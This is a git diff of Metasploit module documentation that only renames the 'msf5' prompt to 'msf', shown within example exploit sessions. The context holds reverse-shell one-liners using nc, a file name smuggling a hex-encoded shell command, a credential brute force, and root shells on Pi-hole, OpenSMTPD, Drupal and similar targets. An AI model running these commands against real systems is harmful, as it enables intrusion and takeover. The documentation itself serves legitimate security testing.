leake ## Scenarios ``` -msf5 exploit(unix/http/laravel_token_unserialize_exec) > check +msf exploit(unix/http/laravel_token_unserialize_exec) > check [*] 172.22.222.112:8000 - APP_KEY not set. Will try to find it... [*] 172.22.222.112:8000 - Checking for CVE-2017-16894 .env information leak [+] 172.22.222.112:8000 - APP_KEY Found via Laravel Framework error information leak: uV1jO3mpnhtdvcsSi1EIUVtSMBXeAvWtL3lmNwx7n9Q= [+] 172.22.222.112:8000 - The target is vulnerable. -msf5 exploit(unix/http/laravel_token_unserialize_exec) > exploit +msf exploit(unix/http/laravel_token_unserialize_exec) > exploit [*] Started reverse TCP handler on 172.22.222.136:4444 [*] 172.22.222.112:8000 - APP_KEY not set. Will try to find it... diff --git a/documentation/modules/exploit/unix/http/pihole_blocklist_exec.md b/documentation/modules/exploit/unix/http/pihole_blocklist_exec.md index 7abed0fdda..93f9c3a643 100644 --- a/documentation/modules/exploit/unix/http/pihole_blocklist_exec.md +++ b/documentation/modules/exploit/unix/http/pihole_blocklist_exec.md @@ -57,7 +57,7 @@ Password for the web interface. Randomly set on install. Use `pihole -a -p` to [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 1.1.1.1:4444 - msf5 exploit(unix/http/pihole_blocklist_exec) > [+] Version Detected: 4.3.2 + msf exploit(unix/http/pihole_blocklist_exec) > [+] Version Detected: 4.3.2 [*] Using URL: http://1.1.1.1:80/ [*] Using cookie: PHPSESSID=45abdcp4rsc9bpi9tchi88ejnn; [*] Using token: WzmrFbksWxIbtuSVeyrf8yv9o541UdhueLN+BRXfUmY= @@ -73,7 +73,7 @@ Password for the web interface. Randomly set on install. Use `pihole -a -p` to [+] Deleted cdJWzln.php [*] Server stopped. - msf5 exploit(unix/http/pihole_blocklist_exec) > sessions -1 + msf exploit(unix/http/pihole_blocklist_exec) > sessions -1 [*] Starting interaction with 1... meterpreter > getuid @@ -106,7 +106,7 @@ Password for the web interface. Randomly set on install. Use `pihole -a -p` to [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 1.1.1.1:4444 - msf5 exploit(unix/http/pihole_blocklist_exec) > [+] Version Detected: 4.4 + msf exploit(unix/http/pihole_blocklist_exec) > [+] Version Detected: 4.4 [*] Using URL: http://1.1.1.1:80/ [*] Using cookie: PHPSESSID=uee4gcfsjk5m8289m4uk4rv1du; [*] Using token: uO4ha1e0fy+Qwvoq14XgslT3Z+VJ/h2RR3qyVT6dPz8= @@ -127,7 +127,7 @@ Password for the web interface. Randomly set on install. Use `pihole -a -p` to [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:48636) at 2020-05-13 20:34:33 -0400 [+] Deleted VRwxqyhs.php - msf5 exploit(unix/http/pihole_blocklist_exec) > sessions -1 + msf exploit(unix/http/pihole_blocklist_exec) > sessions -1 [*] Starting interaction with 1... meterpreter > getuid diff --git a/documentation/modules/exploit/unix/http/pihole_dhcp_mac_exec.md b/documentation/modules/exploit/unix/http/pihole_dhcp_mac_exec.md index a14c7c8fc9..3f1c422738 100644 --- a/documentation/modules/exploit/unix/http/pihole_dhcp_mac_exec.md +++ b/documentation/modules/exploit/unix/http/pihole_dhcp_mac_exec.md @@ -108,19 +108,19 @@ Password for the web interface. Randomly set on install. Use `pihole -a -p` to ### Pi-Hole 4.3 with AdminLTE 4.3 on Ubuntu 18.04 ``` - msf5 > use exploit/unix/http/pihole_dhcp_mac_exec + msf > use exploit/unix/http/pihole_dhcp_mac_exec [*] Using exploit/unix/http/pihole_dhcp_mac_exec - msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set rhosts 2.2.2.2 + msf exploit(unix/http/pihole_dhcp_mac_exec) > set rhosts 2.2.2.2 rhosts => 2.2.2.2 - msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set lhost 1.1.1.1 + msf exploit(unix/http/pihole_dhcp_mac_exec) > set lhost 1.1.1.1 lhost => 1.1.1.1 - msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set lport 8888 + msf exploit(unix/http/pihole_dhcp_mac_exec) > set lport 8888 lport => 8888 - msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set password password123 + msf exploit(unix/http/pihole_dhcp_mac_exec) > set password password123 password => password123 - msf5 exploit(unix/http/pihole_dhcp_mac_exec) > set verbose true + msf exploit(unix/http/pihole_dhcp_mac_exec) > set verbose true verbose => true - msf5 exploit(unix/http/pihole_dhcp_mac_exec) > run + msf exploit(unix/http/pihole_dhcp_mac_exec) > run [+] mkfifo /tmp/wvfacoc; nc 1.1.1.1 8888 0/tmp/wvfacoc 2>&1; rm /tmp/wvfacoc [*] Started reverse TCP handler on 1.1.1.1:8888 diff --git a/documentation/modules/exploit/unix/http/pihole_whitelist_exec.md b/documentation/modules/exploit/unix/http/pihole_whitelist_exec.md index 3dda94b154..52be9b5697 100644 --- a/documentation/modules/exploit/unix/http/pihole_whitelist_exec.md +++ b/documentation/modules/exploit/unix/http/pihole_whitelist_exec.md @@ -56,12 +56,12 @@ Password for the web interface. Randomly set on install. Use `pihole -a -p` to ### Pi-Hole 3.2.1 with AdminLTE 3.2.1 on Ubuntu 18.04 ``` - msf5 > use exploit/unix/http/pihole_whitelist_exec - msf5 exploit(unix/http/pihole_whitelist_exec) > set rhosts 2.2.2.2 + msf > use exploit/unix/http/pihole_whitelist_exec + msf exploit(unix/http/pihole_whitelist_exec) > set rhosts 2.2.2.2 rhosts => 2.2.2.2 - msf5 exploit(unix/http/pihole_whitelist_exec) > set verbose true + msf exploit(unix/http/pihole_whitelist_exec) > set verbose true verbose => true - msf5 exploit(unix/http/pihole_whitelist_exec) > run + msf exploit(unix/http/pihole_whitelist_exec) > run [*] Started reverse TCP handler on 1.1.1.1:4444 [+] Version Detected: 3.2.1 diff --git a/documentation/modules/exploit/unix/http/quest_kace_systems_management_rce.md b/documentation/modules/exploit/unix/http/quest_kace_systems_management_rce.md index 8a35ced1db..38f8bacaa9 100644 --- a/documentation/modules/exploit/unix/http/quest_kace_systems_management_rce.md +++ b/documentation/modules/exploit/unix/http/quest_kace_systems_management_rce.md @@ -48,16 +48,16 @@ ## Scenarios ``` - msf5 > use exploit/unix/http/quest_kace_systems_management_rce - msf5 exploit(unix/http/quest_kace_systems_management_rce) > set rhost 172.16.123.123 + msf > use exploit/unix/http/quest_kace_systems_management_rce + msf exploit(unix/http/quest_kace_systems_management_rce) > set rhost 172.16.123.123 rhost => 172.16.123.123 - msf5 exploit(unix/http/quest_kace_systems_management_rce) > check + msf exploit(unix/http/quest_kace_systems_management_rce) > check [*] 172.16.123.123:80 The target appears to be vulnerable. - msf5 exploit(unix/http/quest_kace_systems_management_rce) > set ORGANIZATION 1 + msf exploit(unix/http/quest_kace_systems_management_rce) > set ORGANIZATION 1 ORGANIZATION => 1 - msf5 exploit(unix/http/quest_kace_systems_management_rce) > set AGENT_VERSION 8.0.152 + msf exploit(unix/http/quest_kace_systems_management_rce) > set AGENT_VERSION 8.0.152 AGENT_VERSION => 8.0.152 - msf5 exploit(unix/http/quest_kace_systems_management_rce) > run + msf exploit(unix/http/quest_kace_systems_management_rce) > run [*] Started reverse TCP handler on 172.16.123.188:4444 [*] Sending payload (505 bytes) diff --git a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md index c01021f1cb..42fb1969d4 100644 --- a/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md +++ b/documentation/modules/exploit/unix/http/schneider_electric_net55xx_encoder.md @@ -27,13 +27,13 @@ You should set a new SSH password to the vulnerable device. **Schneider Electric Pelco Encoder NET5501-XT** -msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set RHOSTS 192.168.34.2 +msf exploit(unix/http/schneider_electric_net55xx_encoder) > set RHOSTS 192.168.34.2 RHOSTS => 192.168.34.2 -msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set RPORT 80 +msf exploit(unix/http/schneider_electric_net55xx_encoder) > set RPORT 80 RPORT => 80 -msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set NEW_PASSWORD msfrapid7 +msf exploit(unix/http/schneider_electric_net55xx_encoder) > set NEW_PASSWORD msfrapid7 NEW_PASSWORD => msfrapid7 -msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > run +msf exploit(unix/http/schneider_electric_net55xx_encoder) > run [] 192.168.34.2:22 - Attempt to start a SSH connection... [] 192.168.34.2:80 - Attempt to change the root password... diff --git a/documentation/modules/exploit/unix/http/xdebug_unauth_exec.md b/documentation/modules/exploit/unix/http/xdebug_unauth_exec.md index c7447f2fdf..f00d2c592a 100644 --- a/documentation/modules/exploit/unix/http/xdebug_unauth_exec.md +++ b/documentation/modules/exploit/unix/http/xdebug_unauth_exec.md @@ -97,7 +97,7 @@ You should see a fairly small number, in my case `4.6014785766602E-5`, which ind ### XDebug 2.5.5 on Ubuntu 16.04 with Apache2 2.4.18 -msf5 exploit(unix/http/xdebug_unauth_exec) > check +msf exploit(unix/http/xdebug_unauth_exec) > check [*] 192.168.69.2:80 - Request sent Date: Fri, 27 Apr 2018 21:00:37 GMT @@ -112,7 +112,7 @@ Content-Type: text/html; charset=UTF-8 [*] 192.168.69.2:80 The target service is running, but could not be validated. -msf5 exploit(unix/http/xdebug_unauth_exec) > exploit +msf exploit(unix/http/xdebug_unauth_exec) > exploit [*] Started reverse TCP handler on 192.168.69.1:4444 [*] 192.168.69.2:80 - Waiting for client response. diff --git a/documentation/modules/exploit/unix/http/zivif_ipcheck_exec.md b/documentation/modules/exploit/unix/http/zivif_ipcheck_exec.md index f7e78eb9ee..1097f522d7 100644 --- a/documentation/modules/exploit/unix/http/zivif_ipcheck_exec.md +++ b/documentation/modules/exploit/unix/http/zivif_ipcheck_exec.md @@ -25,28 +25,28 @@ ``` - msf5 > use exploit/unix/http/zivif_ipcheck_exec - msf5 exploit(unix/http/zivif_ipcheck_exec) > set rhost 192.168.0.35 + msf > use exploit/unix/http/zivif_ipcheck_exec + msf exploit(unix/http/zivif_ipcheck_exec) > set rhost 192.168.0.35 rhost => 192.168.0.35 - msf5 exploit(unix/http/zivif_ipcheck_exec) > set PAYLOAD payload/cmd/unix/generic + msf exploit(unix/http/zivif_ipcheck_exec) > set PAYLOAD payload/cmd/unix/generic PAYLOAD => cmd/unix/generic - msf5 exploit(unix/http/zivif_ipcheck_exec) > set CMD telenetd + msf exploit(unix/http/zivif_ipcheck_exec) > set CMD telenetd CMD => telenetd - msf5 exploit(unix/http/zivif_ipcheck_exec) > exploit + msf exploit(unix/http/zivif_ipcheck_exec) > exploit [*] Sending request [+] Command sent successfully [*] Exploit completed, but no session was created. - msf5 exploit(unix/http/zivif_ipcheck_exec) > - msf5 exploit(unix/http/zivif_ipcheck_exec) > back - msf5 > use auxiliary/scanner/telnet/telnet_login - msf5 auxiliary(scanner/telnet/telnet_login) > set RHOSTS 192.168.0.0/24 + msf exploit(unix/http/zivif_ipcheck_exec) > + msf exploit(unix/http/zivif_ipcheck_exec) > back + msf > use auxiliary/scanner/telnet/telnet_login + msf auxiliary(scanner/telnet/telnet_login) > set RHOSTS 192.168.0.0/24 RHOSTS => 192.168.0.0/24 - msf5 auxiliary(scanner/telnet/telnet_login) > set USERPASS_FILE /root/creds + msf auxiliary(scanner/telnet/telnet_login) > set USERPASS_FILE /root/creds USERPASS_FILE => /root/creds - msf5 auxiliary(scanner/telnet/telnet_login) > set threads 10 + msf auxiliary(scanner/telnet/telnet_login) > set threads 10 threads => 10 - msf5 auxiliary(scanner/telnet/telnet_login) > exploit + msf auxiliary(scanner/telnet/telnet_login) > exploit [!] 192.168.0.34:23 - No active DB -- Credential data will not be saved! [+] 192.168.0.34:23 - 192.168.0.34:23 - Login Successful: root:cat1029 @@ -56,8 +56,8 @@ [-] 192.168.0.34:23 - 192.168.0.34:23 - LOGIN FAILED: admin:cat1029 (Incorrect: ) [*] 192.168.0.34:23 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed - msf5 auxiliary(scanner/telnet/telnet_login) > - msf5 auxiliary(scanner/telnet/telnet_login) > sessions + msf auxiliary(scanner/telnet/telnet_login) > + msf auxiliary(scanner/telnet/telnet_login) > sessions Active sessions =============== @@ -66,7 +66,7 @@ -- ---- ---- ----------- ---------- 1 shell TELNET root:cat1029 (192.168.0.34:23) 0.0.0.0:0 -> 192.168.0.34:23 (192.168.0.34) - msf5 auxiliary(scanner/telnet/telnet_login) > + msf auxiliary(scanner/telnet/telnet_login) > ``` diff --git a/documentation/modules/exploit/unix/local/emacs_movemail.md b/documentation/modules/exploit/unix/local/emacs_movemail.md index 5f68530c32..25ff296a9c 100644 --- a/documentation/modules/exploit/unix/local/emacs_movemail.md +++ b/documentation/modules/exploit/unix/local/emacs_movemail.md @@ -44,8 +44,8 @@ SUID-root shell at `/tmp/sh`. ### 4.3BSD ``` -msf5 > use exploit/unix/local/emacs_movemail -msf5 exploit(unix/local/emacs_movemail) > options +msf > use exploit/unix/local/emacs_movemail +msf exploit(unix/local/emacs_movemail) > options Module options (exploit/unix/local/emacs_movemail): @@ -69,9 +69,9 @@ Exploit target: 0 /usr/lib/crontab.local -msf5 exploit(unix/local/emacs_movemail) > set session -1 +msf exploit(unix/local/emacs_movemail) > set session -1 session => -1 -msf5 exploit(unix/local/emacs_movemail) > run +msf exploit(unix/local/emacs_movemail) > run [*] Setting a sane $PATH: /bin:/usr/bin:/usr/ucb:/etc [-] Current shell is unknown @@ -84,5 +84,5 @@ msf5 exploit(unix/local/emacs_movemail) > run [+] Writing crontab to /usr/lib/crontab.local [!] Please wait at least one minute for effect [*] Exploit completed, but no session was created. -msf5 exploit(unix/local/emacs_movemail) > +msf exploit(unix/local/emacs_movemail) > ``` diff --git a/documentation/modules/exploit/unix/local/opensmtpd_oob_read_lpe.md b/documentation/modules/exploit/unix/local/opensmtpd_oob_read_lpe.md index 4c27729cda..b68d695740 100644 --- a/documentation/modules/exploit/unix/local/opensmtpd_oob_read_lpe.md +++ b/documentation/modules/exploit/unix/local/opensmtpd_oob_read_lpe.md @@ -33,8 +33,8 @@ Set this to a valid session ID on an OpenBSD target. ### OpenSMTPD 6.6.0 on OpenBSD 6.6 ``` -msf5 > use exploit/unix/local/opensmtpd_oob_read_lpe -msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > options +msf > use exploit/unix/local/opensmtpd_oob_read_lpe +msf exploit(unix/local/opensmtpd_oob_read_lpe) > options Module options (exploit/unix/local/opensmtpd_oob_read_lpe): @@ -62,11 +62,11 @@ Exploit target: 0 OpenSMTPD < 6.6.4 (automatic grammar selection) -msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set lhost 172.16.249.1 +msf exploit(unix/local/opensmtpd_oob_read_lpe) > set lhost 172.16.249.1 lhost => 172.16.249.1 -msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 1 +msf exploit(unix/local/opensmtpd_oob_read_lpe) > set session 1 session => 1 -msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run +msf exploit(unix/local/opensmtpd_oob_read_lpe) > run [+] mkfifo /tmp/gkhbba; nc 172.16.249.1 4444 0/tmp/gkhbba 2>&1; rm /tmp/gkhbba [!] SESSION may not be compatible with this module. @@ -109,9 +109,9 @@ Background session 3? [y/N] y ### OpenSMTPD 6.0.4 on OpenBSD 6.3 ``` -msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 2 +msf exploit(unix/local/opensmtpd_oob_read_lpe) > set session 2 session => 2 -msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run +msf exploit(unix/local/opensmtpd_oob_read_lpe) > run [+] mkfifo /tmp/hkioy; nc 172.16.249.1 4444 0/tmp/hkioy 2>&1; rm /tmp/hkioy [!] SESSION may not be compatible with this module. diff --git a/documentation/modules/exploit/unix/misc/qnx_qconn_exec.md b/documentation/modules/exploit/unix/misc/qnx_qconn_exec.md index cbaac43c89..3afe777bef 100644 --- a/documentation/modules/exploit/unix/misc/qnx_qconn_exec.md +++ b/documentation/modules/exploit/unix/misc/qnx_qconn_exec.md @@ -36,12 +36,12 @@ ``` - msf5 > use exploit/unix/misc/qnx_qconn_exec - msf5 exploit(unix/misc/qnx_qconn_exec) > set rhost 172.16.191.215 + msf > use exploit/unix/misc/qnx_qconn_exec + msf exploit(unix/misc/qnx_qconn_exec) > set rhost 172.16.191.215 rhost => 172.16.191.215 - msf5 exploit(unix/misc/qnx_qconn_exec) > set rport 8000 + msf exploit(unix/misc/qnx_qconn_exec) > set rport 8000 rport => 8000 - msf5 exploit(unix/misc/qnx_qconn_exec) > run + msf exploit(unix/misc/qnx_qconn_exec) > run [*] 172.16.191.215:8000 - Sending payload... [+] 172.16.191.215:8000 - Payload sent successfully diff --git a/documentation/modules/exploit/unix/smtp/morris_sendmail_debug.md b/documentation/modules/exploit/unix/smtp/morris_sendmail_debug.md index f084f9afb8..048073c839 100644 --- a/documentation/modules/exploit/unix/smtp/morris_sendmail_debug.md +++ b/documentation/modules/exploit/unix/smtp/morris_sendmail_debug.md @@ -45,8 +45,8 @@ and `cmd/unix/generic` are supported. ### `sendmail` 5.51 on 4.3BSD ``` -msf5 > use exploit/unix/smtp/morris_sendmail_debug -msf5 exploit(unix/smtp/morris_sendmail_debug) > options +msf > use exploit/unix/smtp/morris_sendmail_debug +msf exploit(unix/smtp/morris_sendmail_debug) > options Module options (exploit/unix/smtp/morris_sendmail_debug): @@ -71,11 +71,11 @@ Exploit target: 0 @(#)version.c 5.51 (Berkeley) 5/2/86 -msf5 exploit(unix/smtp/morris_sendmail_debug) > set rhosts 127.0.0.1 +msf exploit(unix/smtp/morris_sendmail_debug) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 exploit(unix/smtp/morris_sendmail_debug) > set lhost 192.168.56.1 +msf exploit(unix/smtp/morris_sendmail_debug) > set lhost 192.168.56.1 lhost => 192.168.56.1 -msf5 exploit(unix/smtp/morris_sendmail_debug) > run +msf exploit(unix/smtp/morris_sendmail_debug) > run [*] Started reverse TCP double handler on 192.168.56.1:4444 [*] 127.0.0.1:25 - Connecting to sendmail diff --git a/documentation/modules/exploit/unix/smtp/opensmtpd_mail_from_rce.md b/documentation/modules/exploit/unix/smtp/opensmtpd_mail_from_rce.md index 51c5f27f50..554264b293 100644 --- a/documentation/modules/exploit/unix/smtp/opensmtpd_mail_from_rce.md +++ b/documentation/modules/exploit/unix/smtp/opensmtpd_mail_from_rce.md @@ -36,8 +36,8 @@ Set this to a valid mail recipient. The default is `root`. ### OpenSMTPD 6.6.0 on OpenBSD 6.6 ``` -msf5 > use exploit/unix/smtp/opensmtpd_mail_from_rce -msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > options +msf > use exploit/unix/smtp/opensmtpd_mail_from_rce +msf exploit(unix/smtp/opensmtpd_mail_from_rce) > options Module options (exploit/unix/smtp/opensmtpd_mail_from_rce): @@ -63,11 +63,11 @@ Exploit target: 0 OpenSMTPD 6.4.0 - 6.6.1 -msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > set rhosts 172.16.249.137 +msf exploit(unix/smtp/opensmtpd_mail_from_rce) > set rhosts 172.16.249.137 rhosts => 172.16.249.137 -msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > set lhost 172.16.249.1 +msf exploit(unix/smtp/opensmtpd_mail_from_rce) > set lhost 172.16.249.1 lhost => 172.16.249.1 -msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > run +msf exploit(unix/smtp/opensmtpd_mail_from_rce) > run [+] mkfifo /tmp/twkfr; nc 172.16.249.1 4444 0/tmp/twkfr 2>&1; rm /tmp/twkfr [*] Started reverse TCP handler on 172.16.249.1:4444 diff --git a/documentation/modules/exploit/unix/ssh/arista_tacplus_shell.md b/documentation/modules/exploit/unix/ssh/arista_tacplus_shell.md index db3afaf926..e4e09c2cf6 100644 --- a/documentation/modules/exploit/unix/ssh/arista_tacplus_shell.md +++ b/documentation/modules/exploit/unix/ssh/arista_tacplus_shell.md @@ -65,7 +65,7 @@ root@kali:~/git/metasploit-framework# ./msfconsole Metasploit tip: Display the Framework log using the log command, learn more with help log -msf5 > search arista +msf > search arista Matching Modulesf ================ @@ -75,8 +75,8 @@ Matching Modulesf 0 exploit/unix/ssh/arista_tacplus_shell 2020-02-02 great Yes Arista restricted shell escape (with privesc) -msf5 > use 0 -msf5 exploit(unix/ssh/arista_tacplus_shell) > show options +msf > use 0 +msf exploit(unix/ssh/arista_tacplus_shell) > show options Module options (exploit/unix/ssh/arista_tacplus_shell): @@ -104,22 +104,22 @@ Exploit target: 0 Universal -msf5 exploit(unix/ssh/arista_tacplus_shell) > set LHOST eth0 +msf exploit(unix/ssh/arista_tacplus_shell) > set LHOST eth0 LHOST => 10.10.10.20 -msf5 exploit(unix/ssh/arista_tacplus_shell) > set RHOSTS 10.10.10.10 +msf exploit(unix/ssh/arista_tacplus_shell) > set RHOSTS 10.10.10.10 RHOSTS => 10.10.10.10 -msf5 exploit(unix/ssh/arista_tacplus_shell) > set USERNAME admin +msf exploit(unix/ssh/arista_tacplus_shell) > set USERNAME admin USERNAME => admin -msf5 exploit(unix/ssh/arista_tacplus_shell) > set PASSWORD admin +msf exploit(unix/ssh/arista_tacplus_shell) > set PASSWORD admin PASSWORD => admin -msf5 exploit(unix/ssh/arista_tacplus_shell) > check +msf exploit(unix/ssh/arista_tacplus_shell) > check [+] 10.10.10.10:22 - The target is vulnerable. -msf5 exploit(unix/ssh/arista_tacplus_shell) > exploit -j +msf exploit(unix/ssh/arista_tacplus_shell) > exploit -j [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 10.10.10.20:4444 [*] 10.10.10.10:22 - Attempt to login to the Arista's restricted shell... -msf5 exploit(unix/ssh/arista_tacplus_shell) > [+] SSH connection established. +msf exploit(unix/ssh/arista_tacplus_shell) > [+] SSH connection established. [*] Requesting pty rbash [+] Pty successfully obtained. [*] Requesting a shell. @@ -127,7 +127,7 @@ msf5 exploit(unix/ssh/arista_tacplus_shell) > [+] SSH connection established. [*] Attempting to break out of Arista rbash... [+] Escaped from rbash! [*] Command shell session 1 opened (10.01.10.20:4444 -> 10.10.10.10:51153) at 2020-06-09 15:39:53 -0700 -msf5 exploit(unix/ssh/arista_tacplus_shell) > sessions -i 1 +msf exploit(unix/ssh/arista_tacplus_shell) > sessions -i 1 [*] Starting interaction with 1... bash-4.3# whoami whoami @@ -136,5 +136,5 @@ bash-4.3# exit exit exit [*] 10.10.10.10 - Command shell session 1 closed. -msf5 exploit(unix/ssh/arista_tacplus_shell) > +msf exploit(unix/ssh/arista_tacplus_shell) > ``` diff --git a/documentation/modules/exploit/unix/webapp/ajenti_auth_username_cmd_injection.md b/documentation/modules/exploit/unix/webapp/ajenti_auth_username_cmd_injection.md index c232a76f55..10dfbca68a 100644 --- a/documentation/modules/exploit/unix/webapp/ajenti_auth_username_cmd_injection.md +++ b/documentation/modules/exploit/unix/webapp/ajenti_auth_username_cmd_injection.md @@ -34,12 +34,12 @@ Set this to the Ajenti base path. The default is `/`. ### Tested Ajenti 2.1.31 on Ubuntu 19.10 x64 ``` -msf5 > use exploit/unix/webapp/ajenti_auth_username_cmd_injection -msf5 exploit(unix/webapp/ajenti_auth_username_cmd_injection) > set RHOSTS 172.16.172.135 +msf > use exploit/unix/webapp/ajenti_auth_username_cmd_injection +msf exploit(unix/webapp/ajenti_auth_username_cmd_injection) > set RHOSTS 172.16.172.135 RHOSTS => 172.16.172.135 -msf5 exploit(unix/webapp/ajenti_auth_username_cmd_injection) > set LHOST 172.16.172.1 +msf exploit(unix/webapp/ajenti_auth_username_cmd_injection) > set LHOST 172.16.172.1 LHOST => 172.16.172.1 -msf5 exploit(unix/webapp/ajenti_auth_username_cmd_injection) > exploit +msf exploit(unix/webapp/ajenti_auth_username_cmd_injection) > exploit [*] Started reverse TCP handler on 172.16.172.1:4444 [*] Exploiting... diff --git a/documentation/modules/exploit/unix/webapp/bolt_authenticated_rce.md b/documentation/modules/exploit/unix/webapp/bolt_authenticated_rce.md index 61c20318dd..52b66cb54e 100644 --- a/documentation/modules/exploit/unix/webapp/bolt_authenticated_rce.md +++ b/documentation/modules/exploit/unix/webapp/bolt_authenticated_rce.md @@ -60,7 +60,7 @@ The username for the Bolt CMS account to authenticate with. This option is requi ### Bolt CMS 3.7.0 running on CentOS 7 ``` -msf5 exploit(unix/webapp/bolt_authenticated_rce) > show options +msf exploit(unix/webapp/bolt_authenticated_rce) > show options Module options (exploit/unix/webapp/bolt_authenticated_rce): @@ -96,7 +96,7 @@ Exploit target: 2 Linux (cmd) -msf5 exploit(unix/webapp/bolt_authenticated_rce) > run +msf exploit(unix/webapp/bolt_authenticated_rce) > run [*] Started reverse TCP handler on 192.168.1.10:4444 [*] Executing automatic check (disable AutoCheck to override) @@ -116,7 +116,7 @@ uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfi ### Bolt CMS 3.7.0 running on Ubuntu 18.04 ``` -msf5 exploit(unix/webapp/bolt_authenticated_rce) > options +msf exploit(unix/webapp/bolt_authenticated_rce) > options Module options (exploit/unix/webapp/bolt_authenticated_rce): @@ -152,7 +152,7 @@ Exploit target: 1 Linux (x64) -msf5 exploit(unix/webapp/bolt_authenticated_rce) > run +msf exploit(unix/webapp/bolt_authenticated_rce) > run [*] Started reverse TCP handler on 172.28.128.1:4444 [*] Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md index 84a6ee5a66..ad946cc7b4 100644 --- a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md +++ b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md @@ -79,19 +79,19 @@ Defaults to `/tmp`, but other options may include `/var/tmp` and Drupal 7.57 from the Docker image is tested below. ``` -msf5 > use exploit/unix/webapp/drupal_drupalgeddon2 -msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 172.17.0.3 +msf > use exploit/unix/webapp/drupal_drupalgeddon2 +msf exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 172.17.0.3 rhost => 172.17.0.3 -msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set verbose true +msf exploit(unix/webapp/drupal_drupalgeddon2) > set verbose true verbose => true -msf5 exploit(unix/webapp/drupal_drupalgeddon2) > check +msf exploit(unix/webapp/drupal_drupalgeddon2) > check [*] Drupal 7 targeted at http://172.17.0.3/ [+] Drupal appears unpatched in CHANGELOG.txt [*] Executing with printf(): sdHl4fLONOKfVZL1cEvXuJCuSkue [+] Drupal is vulnerable to code execution [+] 172.17.0.3:80 The target is vulnerable. -msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run +msf exploit(unix/webapp/drupal_drupalgeddon2) > run [*] Started reverse TCP handler on 172.17.0.1:4444 [*] Drupal 7 targeted at http://172.17.0.3/ diff --git a/documentation/modules/exploit/unix/webapp/drupal_restws_unserialize.md b/documentation/modules/exploit/unix/webapp/drupal_restws_unserialize.md index dd81eb9377..27341f3946 100644 --- a/documentation/modules/exploit/unix/webapp/drupal_restws_unserialize.md +++ b/documentation/modules/exploit/unix/webapp/drupal_restws_unserialize.md @@ -53,7 +53,7 @@ output. Defaults to `false` unless `cmd/unix/generic` is your payload. ## Usage ``` -msf5 exploit(unix/webapp/drupal_restws_unserialize) > run +msf exploit(unix/webapp/drupal_restws_unserialize) > run [*] Started reverse TCP handler on 192.168.1.2:4444 [*] Drupal 8 targeted at http://127.0.0.1/ diff --git a/documentation/modules/exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.md b/documentation/modules/exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.md index 3f33899659..612710e193 100644 --- a/documentation/modules/exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.md +++ b/documentation/modules/exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.md @@ -57,16 +57,16 @@ ## Scenarios ``` - msf5 > use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection - msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set rhosts 172.16.191.253 + msf > use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection + msf exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set rhosts 172.16.191.253 rhosts => 172.16.191.253 - msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set targeturi /elFinder-2.1.47 + msf exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set targeturi /elFinder-2.1.47 targeturi => /elFinder-2.1.47 - msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set verbose true + msf exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set verbose true verbose => true - msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > check + msf exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > check [*] 172.16.191.253:80 - The target service is running, but could not be validated. - msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run + msf exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [*] Uploading payload 'CDj7j1.jpg;echo 6370202e2e2f66696c65732f43446a376a312e6a70672a6563686f2a202e6b50555871684d5a2e706870 |xxd -r -p |sh& #.jpg' (1894 bytes) diff --git a/documentation/modules/exploit/unix/webapp/fusionpbx_exec_cmd_exec.md b/documentation/modules/exploit/unix/webapp/fusionpbx_exec_cmd_exec.md index c35d535470..48d9b03a17 100644 --- a/documentation/modules/exploit/unix/webapp/fusionpbx_exec_cmd_exec.md 